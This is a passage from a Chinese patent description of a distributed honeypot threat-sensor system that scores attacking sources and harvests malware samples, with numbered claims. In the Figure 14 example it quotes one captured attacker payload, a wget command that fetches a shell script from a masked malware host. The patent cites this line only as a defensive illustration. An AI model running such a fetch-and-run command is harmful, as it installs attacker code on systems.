一旦循环完成,并且框1150中没有剩余的时间周期,流程图转到框1160:基于以下一个或多个调整显著性得分:交互来源的积极性、从交互来源接收到的有效负载分类、与来源交互的端口数目、与来源交互的威胁传感器总数或与来源相关联的出站发起连接的数目。流程图在框1170中确定是否存在显著性得分过高的指示。如果存在显著性得分过高的指示,那么流程图转到1175:基于显著性得分错误地过高的指示,将显著性得分修改为下限阈值。如果在1170中不存在显著性得分过高的指示,以及如果存在显著性得分过高的指示则在执行1175之后,流程图最终只是在1180中返回显著性得分。
[0173]
图12是根据一些实施例的可由分布式威胁传感器分析和相关组件实施的说明性方法的流程图,其中分布式威胁传感器分析和相关组件获得与威胁传感器交互的不同来源的显著性得分,基于显著性得分确定哪些来源是恶意参与者,接收已知参与者的标识符,例
如提供商网络中的服务器、提供商网络中的计算实例、客户端网络中的客户端装置或远程网络中部署的iot装置,并使恶意参与者与已知参与者相关,以识别哪些已知参与者可能受到恶意软件感染。
[0174]
流程图开始于1210:获得与多个威胁传感器交互的来源的多个标识符以及与所述多个标识符中的单独标识符相关联的显著性得分。流程图转到1220:至少部分地基于显著性得分,确定为所述多个单独标识符的子集的恶意参与者标识符。流程图转到1230:接收已知参与者的标识符,其中已知参与者可包含:提供商网络中的服务器、提供商网络中的计算实例、客户端网络中的客户端装置或远程网络中部署的iot装置。然后,流程图转到1240:使恶意参与者的标识符与已知参与者的标识符相关,以将已知参与者中的一个或多个识别为被恶意软件感染。
[0175]
1240之后,流程图可以实施一种或多种不同的通知操作。它可以在框1250中将被恶意软件感染的一个或多个已知装置的指示提供给目标。它还可在框1260中触发执行客户提供的功能。它还可在框1270中向远程网络发送消息,指示受感染的已知装置。另外或替代地,流程图可以在框1280中终止受感染的已知装置的证书,例如安全证书。
[0176]
威胁传感器的额外细节的逻辑图
[0177]
图13是根据一些实施例的含有多个不同威胁数据收集器的威胁传感器的逻辑图,其中威胁数据收集器从潜在恶意参与者接收入站通信,其中低交互威胁数据收集器设计成捕获通过tcp和udp以及icmp消息的服务端口上的交互,中等交互威胁数据收集器用于telnet、ssh和ssdp/upnp。本图显示了可以在一个威胁传感器上实施的数个不同威胁数据收集器。首先,存在tcp/udp和icmp上的低交互威胁数据收集器1304。还存在telnet威胁数据收集器1306、ssh威胁数据收集器1308及ssdp/upnp威胁数据收集器1310。在任何给定威胁传感器中还可存在各种不同的威胁数据收集器,包含这些所示威胁数据收集器的全部或一些,或者不含这些收集器,并且所示威胁数据收集器仅用于示例。
[0178]
在一些实施例中,不同的威胁数据收集器被设计为捕获通过tcp和udp以及icmp消息的所有服务端口上的任何交互1304。在一些实施例中,在tcp交互的情况下,威胁数据收集器完成握手,然后它们可以在关闭连接之前捕获多达10kb的网络有效负载。在一些实施例中,在通过tcp的tls交互中,威胁数据收集器可配置成完成tls握手,以便以明文形式访问可疑有效负载。在一些实施例中,对于udp和icmp交互,威胁情报系统的威胁数据收集器可以捕获所接收消息上高达10kb的网络有效负载。在一些实施例中,这些有效负载可具有威胁情报价值,因为它们通常还包含其它威胁指标,例如恶意软件分发点的链接以及关于威胁参与者和所用攻击载体的信息。
[0179]
在一些实施例中,除了这些低交互威胁数据收集器外,威胁情报系统的威胁传感器还可以配备用于telnet的中等交互威胁数据收集器1306、用于ssh的中等交互威胁数据收集器1308和用于ssdp/upnp的中等交互威胁数据收集器1310。在一些实施例中,这些威胁数据收集器模拟其对应真实服务的功能,引导可疑对象的交互,以显示更多信息,例如恶意软件样本以及报告和命令和控制服务器的网络位置。在这些实施例中的一些实施例中,例如使用假外壳(fake shells)的模拟方法确保传感器自身的完整性得到保护,并且可疑对象不能篡改其操作。
[0180]
图13中顶部的表格1302显示了威胁数据收集器为交互收集的一些信息。表格具有
以下列:交互来源的来源地址,标记为“srcaddr”;与来源交互的威胁传感器上的目标端口,标记为“dstport”;以及威胁数据收集器从来源接收的有效负载,标记为“有效负载”。顶部表格包含为tcp/udp和icmp上的低交互威胁数据收集器1304以及ssdp/upnp威胁数据收集器1310的交互收集的信息。
[0181]
图13中底部的表格1312显示了威胁数据收集器为交互收集的一些信息。表格具有以下列:交互来源的来源地址,标记为“srcaddr”;与来源交互的威胁传感器上的目标端口,标记为“dstport”;以及使用指派给交互的威胁数据收集器协议记录的与来源的会话,标记为“会话”。底部表格1312包含为telnet威胁数据收集器1306和ssh威胁数据收集器1308的交互收集的信息。1312的第一行是在目标端口23上的telnet会话期间收集的信息,1312的底部行是在目标端口22上的ssh会话期间收集的信息。
[0182]
图14是根据一些实施例的逻辑图,示出了在数据存储区中检索和存储恶意软件样本以关于威胁传感器和/或威胁数据收集器与外部恶意软件分布点的交互进行进一步静态和动态分析,其中检索到的文件以递归方式获取和分析以供进一步的出站引用。
[0183]
在一些实施例中,对于可疑对象与外部恶意软件分发点的交互,威胁情报系统可以检索恶意软件样本并将其存储在数据存储区1404中,以进行进一步的静态和动态分析。取决于实施例,这可以由处理交互的威胁数据收集器、威胁传感器、威胁传感器部署和管理组件或分布式威胁传感器数据聚合和数据导出组件执行。检索到的文件以递归方式获取和分析以供进一步的出站引用。在一些实施例中,这种递归检索机制可能仅适用于与启发式匹配的文件,用于检测具有匹配启发式标头内容和引用上下文的脚本文件(非二进制)。
[0184]
在图14所示的实例中,威胁数据收集器首先在框1402中从目标端口8081上的来源地址“sxx.xxx.xxx.45”接收交互。交互的有效负载包含命令:“wget+http://xxxx.xxx.xxx.38/netg.sh”。威胁情报系统,例如威胁传感器的威胁数据收集器,可以模拟参考与此外部恶意软件分发点的受控交互,如表格1406所示。例如,威胁数据收集器可能会发起到“http://xxxx.xxx.xxx.38/netg.sh”的出站交互,如1406所示。此交互可能会接收指示发起方发起到不同位置的其它出站链接的内容。例如,威胁数据收集器可能会发起这些其它链接。这些其它链接可能会接收不同的“可执行和可链接格式(elf)二进制文件”,然后这些文件可以存储在数据存储区1404中以供进一步分析。
[0185]
除了存储这些引用文件外,威胁情报系统还将其分发点视为与威胁数据收集器进行虚拟出站交互。当引用的文件上传到数据存储区1404时,每个交互记录可包含以下关于出站链接的元数据:content_hash、content_len、content_type、inbound_addr、inbound_port、outbound_url、header_len和header_hash。可疑出站链接为确定可疑ip地址的显著性得分提供了强有力的手段,尤其是在其与威胁传感器的威胁数据收集器的相关联入站交互的背景下。即使没有与威胁传感器的威胁数据收集器进行任何新的交互,也可以将捕获的关于出站链接的元数据用作指纹,以确定是否继续恶意使用可疑ip地址。
[0186]
iot装置
[0187]
图15是根据一些实施例的例如iot装置的边缘装置的框图,其可以是与潜在恶意装置匹配的一个已知装置。在描绘的实施例中,边缘装置1540包含处理器1500、存储器1502、电池1504和网络接口1506。存储器1502包含本地数据收集器1542。边缘装置1540可为图4中的一个已知iot装置468。
[0188]
在一些实施例中,存储器1502包含可执行指令,并且处理器1500执行所述指令以便实施本地数据收集器1542。在实施例中,网络接口1506将边缘装置1540通信地耦合到本地网络。因此,边缘装置1540经由网络接口1506将数据传输到本地网络,并且有可能将数据传输到边缘装置监测器。在实施例中,网络接口1506可经由有线或无线接口传输数据。
[0189]
在一些实施例中,相比于供提供商网络用于实施模型训练服务的组件(例如,处理器和存储器),边缘装置及其一个或多个组件(例如,处理器和存储器)可能相对较轻较小。例如,供提供商网络的一个或多个服务器用于实施恶意软件感染检测服务的一个或多个存储器和/或一个或多个处理器的大小可能比边缘装置使用的存储器和/或处理器的大小大至少一个数量级。
[0190]
在一些实施例中,威胁情报系统100和/或分布式威胁传感器分析和相关组件402可在用于训练/修改其内部查找器、确定器、置信度水平、机器学习启发式或模型的强化学习过程的上下文内操作。例如,提供商网络102可以在多个时间点(例如,定期)从本地网络获得拓扑数据,并基于拓扑数据,定期修改或更换其内部查找器、确定器、置信度水平、机器学习启发式或模型,以提高准确性,提高结果(例如,预测)的置信度水平,和/或提高本地网络的性能。
[0191]
在实施例中,强化学习过程用于获得预测的最低置信度水平,同时最小化与获得预测相关联的一个或多个成本。例如,边缘装置因网络流量/延迟和/或功耗而产生的成本可以最小化,同时仍可以获得最低的准确度水平。在实施例中,可按照百分比(例如,99%或90.5%)或适合量化置信度水平或准确度水平的任何其它值来测量置信度水平和/或准确度水平,范围从无置信度或准确度(例如,0%)到完全置信度或准确性(例如,100%)。
[0192]
在一些实施例中,图1-14中描述的提供商网络的任何系统、服务、组件或传感器可以在事件驱动执行环境的上下文中操作。例如,可以将一个或多个功能指派给相应事件,使得在事件驱动执行环境检测到指派给特定功能的事件(例如,从一个或多个特定边缘装置接收数据)时,就会触发特定功能。在实施例中,所述功能可包含处理接收到的数据的一个或多个操作,并且可以生成结果(例如,预测)。
[0193]
说明性系统
[0194]
图16是根据一些实施例的框图,示出了可用于威胁情报服务和/或威胁传感器和/或威胁传感器部署和管理组件和/或分布式威胁传感器数据聚合和数据导出组件和/或分布式威胁传感器分析和相关组件的实例计算机系统。在至少一些实施例中,实施本文所述的威胁情报服务和/或威胁传感器和/或威胁传感器部署和管理组件和/或分布式威胁传感器数据聚合和数据导出组件和/或分布式威胁传感器分析和相关组件的部分或全部方法和设备的计算机可包含通用计算机系统或计算装置,其包含或配置成访问一个或多个计算机可访问介质,例如图16所示的计算机系统1600。图16是示出可在一些实施例中使用的实例计算机系统的框图。例如,此计算机系统可用作威胁情报服务100和/或威胁传感器(140,160)和/或威胁传感器部署和管理组件202和/或分布式威胁传感器数据聚合和数据导出组件302和/或分布式威胁传感器分析和相关组件402,或者可用作后端资源主机,用于执行后端资源实例中的一个或多个,或计算服务610a中的多个计算实例(630,650)中的一个或多个或驱动计算服务610b中的多个服务器实例620中的一个或多个。在所示实施例中,计算机系统1600包含经由输入/输出(i/o)接口1630耦合到系统存储器1620的一个或多个处理器
1610。计算机系统1600进一步包含耦合到i/o接口1630的网络接口1640。
[0195]
在各种实施例中,计算机系统1600可以是包含一个处理器1610的单处理器系统,或包含若干处理器1610(例如,两个、四个、八个或另一合适数目)的多处理器系统。处理器1610可以是任何能够执行指令的合适的处理器。例如,在各种实施例中,处理器1610可以是实施各种指令集架构(isa)中的任一个的通用或嵌入式处理器,所述指令集架构例如x86、powerpc、sparc或mip isa,或任何其它合适的isa。在多处理器系统中,每个处理器1610可能通常但不一定实施相同isa。
[0196]
系统存储器1620可配置成存储可由处理器1610访问的指令和数据。在各种实施例中,系统存储器1620可以使用任何合适的存储器技术实施,例如静态随机存取存储器(sram)、同步动态ram(sdram)、非易失性/快闪型存储器或任何其它类型的存储器。在所示实施例中,实施一个或多个所要功能,例如实施上文对于威胁情报服务和/或威胁传感器和/或威胁传感器部署和管理组件和/或分布式威胁传感器数据聚合和数据导出组件和/或分布式威胁传感器分析和相关组件的设备和方法所描述的那些方法、技术和数据的程序指令和数据示出为作为用于威胁情报服务和/或威胁传感器和/或威胁传感器部署和管理组件和/或分布式威胁传感器数据聚合和数据导出组件和/或分布式威胁传感器分析和相关组件的代码和数据1624存储在系统存储器1620内。
[0197]
在一个实施例中,i/o接口1630可配置成协调处理器1610、系统存储器1620和装置中包含网络接口1640或其它外围接口的所有外围装置之间的i/o流量。在一些实施例中,i/o接口1630可执行任何必要的协议、定时或其它数据变换,以将来自一个组件(例如,系统存储器1620)的数据信号转换成适合另一组件(例如,处理器1610)使用的格式。在一些实施例中,i/o接口1630可以支持通过各种类型的外围总线附接的装置,例如外围组件互连(pci)总线标准或通用串行总线(usb)标准的变体。在一些实施例中,i/o接口1630的功能可分为两个或更多个独立组件,例如北桥和南桥。并且,在一些实施例中,i/o接口1630的一些或全部功能,例如到系统存储器1620的接口,可以直接并入处理器1610中。
[0198]
例如,网络接口1640可配置成允许数据在计算机系统1600和附接到一个或多个网络1670上的其它装置1660之间交换,所述其它装置例如图1-6中所示的其它计算机系统或装置。在各种实施例中,例如,网络接口1640可支持经由任何合适的有线或无线通用数据网络通信,例如各类型的以太网。另外,网络接口1640可支持经由例如模拟语音网络或数字光纤通信网络的电信/电话网络、经由例如光纤通道san的存储区域网络或经由任何其它合适类型的网络和/或协议进行通信。
[0199]
在一些实施例中,系统存储器1620可以是配置成存储程序指令和数据的计算机可访问介质的一个实施例,如上文针对图1到14所描述,用于实施威胁情报服务和/或威胁传感器和/或威胁传感器部署和管理组件和/或分布式威胁传感器数据聚合和数据导出组件和/或分布式威胁传感器分析和相关组件。但是,在其它实施例中,程序指令和/或数据可以在不同类型的计算机可访问介质上接收、发送或存储。一般来说,计算机可访问介质可包含非暂时性存储介质或存储器介质,例如磁介质或光学介质,如经由i/o接口1630耦合到计算机系统1600的磁盘或dvd/cd。非暂时性计算机可访问存储介质还可包含任何易失性或非易失性介质,例如ram(例如,sdram、ddr sdram、rdram、sram等)、rom等,它们可以作为系统存储器1620或另一类型的存储器包含在计算机系统1600的一些实施例中。此外,计算机可访
问介质可包含传输介质或信号,例如经由网络和/或无线链路等通信介质传送的电气、电磁或数字信号,例如可以经由网络接口1640实施。
[0200]
各种计算机系统中的任何一个可配置成实施与上述各图中的提供商网络、威胁情报系统、威胁传感器、威胁数据收集器、客户端装置、边缘装置、层装置或任何其它组件相关联的过程。在各种实施例中,图1-14中任一个的提供商网络、威胁情报系统、威胁传感器、威胁数据收集器、客户端装置、边缘装置、层装置或任何其它组件可各自包含一个或多个计算机系统1600,如图16所示。在实施例中,提供商网络、威胁情报系统、威胁传感器、威胁数据收集器、客户端装置、边缘装置、层装置或任何其它组件可包含计算机系统1600的一个或多个组件,这些组件以与计算机系统1600的描述相同或类似的方式工作。
[0201]
可以根据以下条款描述本公开的实施例:
[0202]
条款1.一种系统,其包括:
[0203]
多个计算装置,其物理地位于多个不同地理区域,并且具有相应的处理器和存储器用于执行多个威胁传感器;
[0204]
一个或多个计算机,其中一个或多个处理器和相关联存储器配置成实施提供商网络的威胁传感器部署和管理服务,其中所述威胁传感器部署和管理服务配置成:
[0205]
确定所述多个威胁传感器的部署计划,其中各个威胁传感器指定多个不同类型的威胁数据收集器中的一个或多个威胁数据收集器,其中所述不同类型的威胁数据收集器中的至少一些使用不同的通信协议或通信端口,或者提供不同的针对入站通信的响应,并且其中所述部署计划为威胁传感器指定不同寿命;
[0206]
在所述提供商网络的所述多个不同地理区域中的不同网络地址处部署所述多个威胁传感器,并根据所述部署计划进行配置;
[0207]
从已部署威胁传感器收集威胁数据;
[0208]
基于收集到的威胁数据和所述威胁传感器的所述不同寿命,确定调整后的部署计划,包括对所述部署计划的一个或多个调整;以及
[0209]
根据调整后的部署计划,在一个或多个所述地理区域中,执行对所述威胁传感器的所述调整。
[0210]
条款2.根据条款1所述的系统,其中所述提供商网络提供多个服务,包含虚拟计算实例服务,并且其中所述威胁传感器部署和管理服务使用所述虚拟计算实例服务部署所述多个威胁传感器中的至少一些。
[0211]
条款3.根据条款2所述的系统,其中所述多个威胁传感器中不由所述虚拟计算实例服务实施的至少一特定威胁传感器部署在所述提供商网络外,并且其中为了从所述已部署威胁传感器收集威胁数据,所述威胁传感器部署和管理服务进一步配置成:
[0212]
从所述多个威胁传感器中部署在所述提供商网络外的至少所述特定威胁传感器收集数据。
[0213]
条款4.根据条款1到3中任一项所述的系统,其中所述威胁传感器部署和管理服务进一步配置成:
[0214]
为所述提供商网络的客户端提供界面,以指定所需威胁传感器部署的细节;且
[0215]
其中为了确定所述多个威胁传感器的所述部署计划,所述威胁传感器部署和管理服务进一步配置成:
[0216]
至少部分地基于来自所述客户端的指定细节,确定所述部署计划。
[0217]
条款5.一种方法,其包括:
[0218]
通过威胁传感器部署和管理组件执行以下:
[0219]
确定多个威胁传感器的部署计划,其中各个威胁传感器指定多个不同类型的威胁数据收集器中的一个或多个威胁数据收集器,其中所述不同类型的威胁数据收集器中的至少一些使用不同的通信协议或通信端口,或者提供不同的针对入站通信的响应,并且其中所述部署计划为威胁传感器指定不同寿命;
[0220]
在多个不同地理区域中的多个不同网络地址处部署所述多个威胁传感器,并根据所述部署计划进行配置;
[0221]
从已部署威胁传感器收集威胁数据;
[0222]
基于收集到的威胁数据和所述威胁传感器的所述不同寿命,确定调整后的部署计划,包括对所述部署计划的一个或多个调整;以及
[0223]
根据调整后的部署计划,在一个或多个所述地理区域中执行对所述威胁传感器的所述调整。
[0224]
条款6.根据条款5所述的方法,其进一步包括:
[0225]
通过所述威胁传感器部署和管理组件在不同时间执行调整迭代,其中特定调整迭代包括重复以下操作:
[0226]
从所述已部署威胁传感器收集所述威胁数据;
[0227]
确定所述调整后的部署计划;以及
[0228]
执行对所述威胁传感器的所述调整。
[0229]
条款7.根据条款5或6中任一项所述的方法,其中根据所述调整后的部署计划执行对所述威胁传感器的所述调整进一步包括以下一个或多个:终止威胁传感器,在不同于已部署所述多个威胁传感器的所述多个不同网络地址的新网络地址处部署至少一个新威胁传感器,或修改已部署威胁传感器的所述寿命。
[0230]
条款8.根据条款5到7中任一项所述的方法,其进一步包括:
[0231]
通过所述已部署威胁传感器中的对应威胁传感器的威胁数据收集器记录关于在所述已部署威胁传感器中的所述对应威胁传感器处接收到的入站通信的信息;以及
[0232]
通过所述已部署威胁传感器中的所述对应威胁传感器,从所述对应威胁数据收集器的记录动作生成威胁传感器日志。
[0233]
条款9.根据条款5到8中任一项所述的方法,其进一步包括:
[0234]
通过已部署威胁传感器的所述威胁数据收集器中的特定威胁数据收集器,用不同的识别信息响应入站通信,以模拟来自不同类型的系统的响应。
[0235]
条款10.根据条款5到9中任一项所述的方法,其进一步包括:
[0236]
通过所述威胁传感器部署和管理组件执行以下操作:
[0237]
确定特定地理区域的一个或多个威胁传感器正在接收数目大于阈值的入站通信;以及
[0238]
至少部分地基于所述确定,在所述特定地理区域中的网络地址处部署额外威胁传感器。
[0239]
条款11.根据条款5到10中任一项所述的方法,其进一步包括:
[0240]
通过所述威胁传感器部署和管理组件执行以下操作:
[0241]
确定所述部署的多个威胁传感器中的特定威胁传感器正在接收数目大于阈值的入站通信;以及
[0242]
至少部分地基于所述确定,延长所述特定威胁传感器的所述寿命。
[0243]
条款12.根据条款5到11中任一项所述的方法,其中已部署威胁传感器中所述不同威胁数据收集器中的至少两个使用不同通信协议在相同端口上通信,所述方法进一步包括:
[0244]
通过所述已部署威胁传感器执行以下操作:
[0245]
确定入站通信的入站通信协议;以及
[0246]
选择使用所确定的入站通信协议通信的所述至少两个威胁数据收集器中的所述威胁数据收集器来处理所述入站通信。
[0247]
条款13.根据条款5到12中任一项所述的方法,其中已部署威胁传感器中所述不同威胁数据收集器中的至少两个使用不同通信协议在相同端口上通信,所述方法进一步包括:
[0248]
通过所述已部署威胁传感器执行以下操作:
[0249]
接收入站通信;以及
[0250]
选择所述不同威胁数据收集器中的所述至少两个中的一个来响应所述入站通信,其中所述选择是基于权重的随机选择,其中向各个不同威胁数据收集器赋予权重。
[0251]
条款14.根据条款5到13中任一项所述的方法,其进一步包括:
[0252]
通过已部署威胁传感器的所述威胁数据收集器中的特定威胁数据收集器执行以下操作:
[0253]
分析入站通信,其中所述入站通信包括发起去往一网络地址的通信的请求;
[0254]
确定所述网络地址存在于所述入站通信中;以及
[0255]
从存在于所述入站通信中的所述网络地址下载数据,以便确定可用于威胁情报的信息。
[0256]
条款15.根据条款5到14中任一项所述的方法,其中部署所述多个威胁传感器的所述不同网络地址未公布。
[0257]
条款16.一个或多个存储程序指令的非暂时性计算机可读存储介质,所述程序指令在威胁传感器部署和管理组件的一个或多个处理器上或跨所述一个或多个处理器执行时使所述一个或多个处理器:
[0258]
确定多个威胁传感器的部署计划,其中各个威胁传感器指定多个不同类型的威胁数据收集器中的一个或多个威胁数据收集器,其中所述不同类型的威胁数据收集器中的至少一些使用不同的通信协议或通信端口,或者提供不同的针对入站通信的响应,并且其中所述部署计划为威胁传感器指定不同寿命;
[0259]
在多个不同地理区域中的多个不同网络地址处部署所述多个威胁传感器,并根据所述部署计划进行配置;
[0260]
从已部署威胁传感器收集威胁数据;
[0261]
基于收集到的威胁数据和所述威胁传感器的所述不同寿命,确定调整后的部署计划,包括对所述部署计划的一个或多个调整;以及
[0262]
根据调整后的部署计划,在一个或多个所述地理区域中执行对所述威胁传感器的所述调整。
[0263]
条款17.根据条款16所述的一个或多个非暂时性计算机可读存储介质,其中所述程序指令进一步使所述威胁传感器部署和管理组件的所述一个或多个处理器:
[0264]
在不同时间执行调整迭代,其中特定调整迭代包括重复以下操作:
[0265]
从所述已部署威胁传感器收集所述威胁数据;
[0266]
确定所述调整后的部署计划;以及
[0267]
执行对所述威胁传感器的所述调整。
[0268]
条款18.根据条款16或17中任一项所述的一个或多个非暂时性计算机可读存储介质,其中为了根据所述调整后的部署计划执行对所述威胁传感器的所述调整,所述程序指令进一步使所述威胁传感器部署和管理组件的所述一个或多个处理器执行以下一个或多个:
[0269]
终止威胁传感器;
[0270]
在不同于已部署所述多个威胁传感器的所述多个不同网络地址的新网络地址处部署至少一个新威胁传感器;或
[0271]
修改已部署威胁传感器的所述寿命。
[0272]
条款19.根据条款16到18中任一项所述的一个或多个非暂时性计算机可读存储介质,其中所述程序指令进一步使所述威胁传感器部署和管理组件所述一个或多个处理器:
[0273]
确定特定的已部署威胁传感器已经从单个来源接收到阈值数目的入站通信;以及
[0274]
阻止所述特定的已部署威胁传感器的所述多个不同威胁数据收集器响应来自所述单个来源的其它入站通信。
[0275]
条款20.根据条款16到19中任一项所述的一个或多个非暂时性计算机可读存储介质,其中所述程序指令进一步使所述威胁传感器部署和管理组件的所述一个或多个处理器:
[0276]
确定已部署的多个威胁传感器中的特定威胁传感器受到恶意软件威胁;以及
[0277]
至少部分地基于所述确定,终止所述特定威胁传感器。
[0278]
还可以根据以下条款描述本公开的实施例:
[0279]
条款21.一种系统,其包括:
[0280]
多个计算装置,其包括相应处理器和存储器用于执行多个威胁传感器,所述威胁传感器检测与交互来源的交互,其中所述多个威胁传感器部署在相应的多个不同网络地址处且物理地位于提供商网络中的不同地理区域;
[0281]
一个或多个处理器和相关联存储器,其配置成实施所述提供商网络的分布式威胁传感器数据聚合和数据导出服务,其中所述分布式威胁传感器数据聚合和数据导出服务配置成:
[0282]
从部署在所述提供商网络中的所述多个威胁传感器接收传感器日志流,其中所述传感器日志流中的各个日志包括关于与相应威胁传感器的相应交互的信息,并且其中所述信息包含所述交互的所述来源的相应标识符;
[0283]
按照所述交互的所述来源的标识符,从在限定时间周期内自所述多个威胁传感器接收到的所述传感器日志流中将关于与所述威胁传感器的所述交互的所述信息聚合成所
述交互的所述相应各个来源的关于所述交互的聚合信息;
[0284]
至少部分地基于关于所述交互的所述聚合信息,计算所述交互的所述相应各个来源的相应显著性得分,其中相应各个显著性得分包括所述相应各个来源参与威胁网络通信的可能性;以及
[0285]
针对所述交互的所述相应各个来源中的至少一些,将所述相应显著性得分中的至少一些提供到一个或多个目标。
[0286]
条款22.根据条款21所述的系统,其中所述提供商网络提供多个服务,包含数据流服务,并且其中来自所述多个威胁传感器的所述传感器日志流是从所述提供商网络的所述数据流服务接收到的。
[0287]
条款23.根据条款21或22中任一项所述的系统,其中所述多个威胁传感器中的至少一特定威胁传感器部署在所述提供商网络外,并且其中为了从所述多个威胁传感器接收所述传感器日志流,所述分布式威胁传感器数据聚合和数据导出服务进一步配置成:
[0288]
从所述多个威胁传感器中部署在所述提供商网络外的至少所述特定威胁传感器接收传感器日志。
[0289]
条款24.根据条款21到23中任一项所述的系统,其中为了计算所述交互的所述相应各个来源中所述交互的单个来源的所述相应显著性得分中的显著性得分,所述分布式威胁传感器数据聚合和数据导出服务进一步配置成:
[0290]
至少部分地基于所述单个来源在所述限定时间周期内的关于所述交互的所述聚合信息,以及所述单个来源在先前限定时间周期内的关于交互的聚合信息,确定关于所述交互发生的新近程度的新近度信息;
[0291]
确定在所述限定时间周期中的至少一个期间与所述单个来源通信的所述多个威胁传感器的数目;以及
[0292]
至少部分地基于所确定的新近度信息和所确定的与所述单个来源通信的威胁传感器的数目,计算所述交互的所述单个来源的所述显著性得分。
[0293]
条款25.一种方法,其包括:
[0294]
通过分布式威胁传感器数据聚合和数据导出组件执行以下操作:
[0295]
从多个威胁传感器接收传感器日志流,其中所述传感器日志流中的各个日志包括关于与相应威胁传感器的相应交互的信息,并且其中所述信息包含所述交互的所述来源的相应标识符;
[0296]
按照所述交互的所述来源的标识符,从在限定时间周期内自所述多个威胁传感器接收到的所述传感器日志流中将关于与所述威胁传感器的所述交互的所述信息聚合成所述交互的所述相应各个来源在所述限定时间周期内的关于所述交互的聚合信息;
[0297]
至少部分地基于关于所述交互的所述聚合信息,计算所述交互的所述相应各个来源的相应显著性得分,其中相应各个显著性得分包括所述相应各个来源参与威胁网络通信的可能性;以及
[0298]
针对所述交互的所述相应各个来源中的至少一些,将所述相应显著性得分中的至少一些提供到一个或多个目标。
[0299]
条款26.根据条款25所述的方法,其中计算所述交互的所述相应各个来源中所述交互的单个来源的所述相应显著性得分中的显著性得分包括:
[0300]
至少部分地基于所述单个来源在所述限定时间周期内的关于所述交互的所述聚合信息以及所述单个来源在先前限定时间周期内的关于交互的聚合信息,确定关于所述交互发生的新近程度的新近度信息;
[0301]
确定在所述限定时间周期中的至少一个期间与所述单个来源通信的所述多个威胁传感器的数目;
[0302]
至少部分地基于所确定的新近度信息和所确定的与所述单个来源通信的威胁传感器的数目,计算所述交互的所述单个来源的所述显著性得分。
[0303]
条款27.根据条款25或26中任一项所述的方法,其中计算所述交互的所述相应各个来源中所述交互的单个来源的所述相应显著性得分中的显著性得分包括:
[0304]
至少部分地基于以下一个或多个计算所述显著性得分:从所述交互的所述单个来源接收到的有效负载的所确定分类、与所述交互的所述单个来源交互的不同端口的所确定数目、与所述交互的所述单个来源交互的威胁传感器的所确定数目、与所述交互的所述单个来源相关联的出站发起连接的所确定数目,或与所述交互的所述单个来源相关联的网络地址的所确定静态或动态性质。
[0305]
条款28.根据条款25到27中任一项所述的方法,其中关于与所述相应威胁传感器的所述相应交互的所述信息进一步包括以下一个或多个:所述交互的目标端口、所述交互的有效负载分类、供所述交互使用的协议、检测到所述交互的所述一个或多个威胁传感器,以及关于所述交互是入站发起连接还是出站发起连接还是同时为入站和出站发起连接两者的信息。
[0306]
条款29.根据条款28所述的方法,其进一步包括:
[0307]
通过所述分布式威胁传感器数据收集和数据导出组件执行以下操作:
[0308]
将接收到的传感器日志流存储在数据库中,包括关于与所述相应威胁传感器的所述相应交互的所述信息,其中所述数据库提供查询接口,用于分析所述接收到的传感器日志流中关于与所述相应威胁传感器的所述相应交互的所述信息。
[0309]
条款30.根据条款25到29中任一项所述的方法,其中所述交互的所述来源的所述标识符包括与所述交互的所述来源相关联的ip地址,并且其中所述交互的所述相应各个来源的关于所述交互的所述聚合信息包括按照ip地址聚合d的信息。
[0310]
条款31.根据条款25到30中任一项所述的方法,其进一步包括:
[0311]
通过所述分布式威胁传感器数据聚合和数据导出组件执行以下操作:
[0312]
接收使地理位置或外部互联网服务提供商与所述交互的所述来源的所述标识符相关联的信息;且
[0313]
其中计算所述交互的所述相应各个来源的所述相应显著性得分进一步至少部分地基于接收到的信息。
[0314]
条款32.根据条款25到31中任一项所述的方法,其进一步包括:
[0315]
通过所述分布式威胁传感器数据聚合和数据导出组件执行以下操作:
[0316]
获得外部威胁情报信息;以及
[0317]
确定所述外部威胁情报信息中对应于所述交互的所述来源的所述标识符中的至少一个的部分;
[0318]
其中计算所述交互的所述相应各个来源的所述相应显著性得分进一步至少部分
地基于对应于所述交互的所述来源的所述标识符中的所述至少一个的所述外部威胁情报信息。
[0319]
条款33.根据条款25到32中任一项所述的方法,其中至少部分地基于关于所述交互的所述聚合信息计算所述交互的所述相应各个来源的所述相应显著性得分进一步包括:
[0320]
至少部分地基于关于所述计算的计算的用户输入,计算所述相应显著性得分。
[0321]
条款34.根据条款25到33中任一项所述的方法,其进一步包括:
[0322]
通过所述分布式威胁传感器数据聚合和数据导出组件执行以下操作:
[0323]
生成关于所述聚合信息和所述显著性得分的指标以在用户界面或仪表板中显示。
[0324]
条款35.一个或多个存储程序指令的非暂时性计算机可读存储介质,所述程序指令在分布式威胁传感器数据收集和数据导出组件的一个或多个处理器上或跨所述一个或多个处理器执行时使所述一个或多个处理器:
[0325]
从多个威胁传感器接收传感器日志流,其中所述传感器日志流中的各个日志包括关于与相应威胁传感器的相应交互的信息,并且其中所述信息包含所述交互的所述来源的相应标识符;
[0326]
按照所述交互的所述来源的标识符,从在限定时间周期内自所述多个威胁传感器接收到的所述传感器日志流中将关于与所述威胁传感器的所述交互的所述信息聚合成所述交互的所述相应各个来源在所述限定时间周期内的关于所述交互的聚合信息;
[0327]
至少部分地基于关于所述交互的所述聚合信息,计算所述交互的所述相应各个来源的相应显著性得分,其中相应各个显著性得分包括所述相应各个来源参与威胁网络通信的可能性;以及
[0328]
针对所述交互的所述相应各个来源中的至少一些,将所述相应显著性得分中的至少一些提供到一个或多个目标。
[0329]
条款36.根据条款35所述的一个或多个非暂时性计算机可读存储介质,其中为了计算所述交互的所述相应各个来源中所述交互的单个来源的所述相应显著性得分中的显著性得分,所述程序指令进一步使所述分布式威胁传感器数据收集和数据导出组件的所述一个或多个处理器:
[0330]
至少部分地基于所述单个来源在所述限定时间周期内的关于所述交互的所述聚合信息以及所述单个来源在先前限定时间周期内的关于交互的聚合信息,确定关于所述交互发生的新近程度的新近度信息;
[0331]
确定在所述限定时间周期中的至少一个期间与所述单个来源通信的所述多个威胁传感器的数目;以及
[0332]
至少部分地基于所确定的新近度信息和所确定的与所述单个来源通信的威胁传感器的数目,计算所述交互的所述单个来源的所述显著性得分。
[0333]
条款37.根据条款35或36中任一项所述的一个或多个非暂时性计算机可读存储介质,其中为了计算所述交互的所述相应各个来源中所述交互的单个来源的所述相应显著性得分中的显著性得分,所述程序指令进一步使所述分布式威胁传感器数据收集和数据导出组件的所述一个或多个处理器:
[0334]
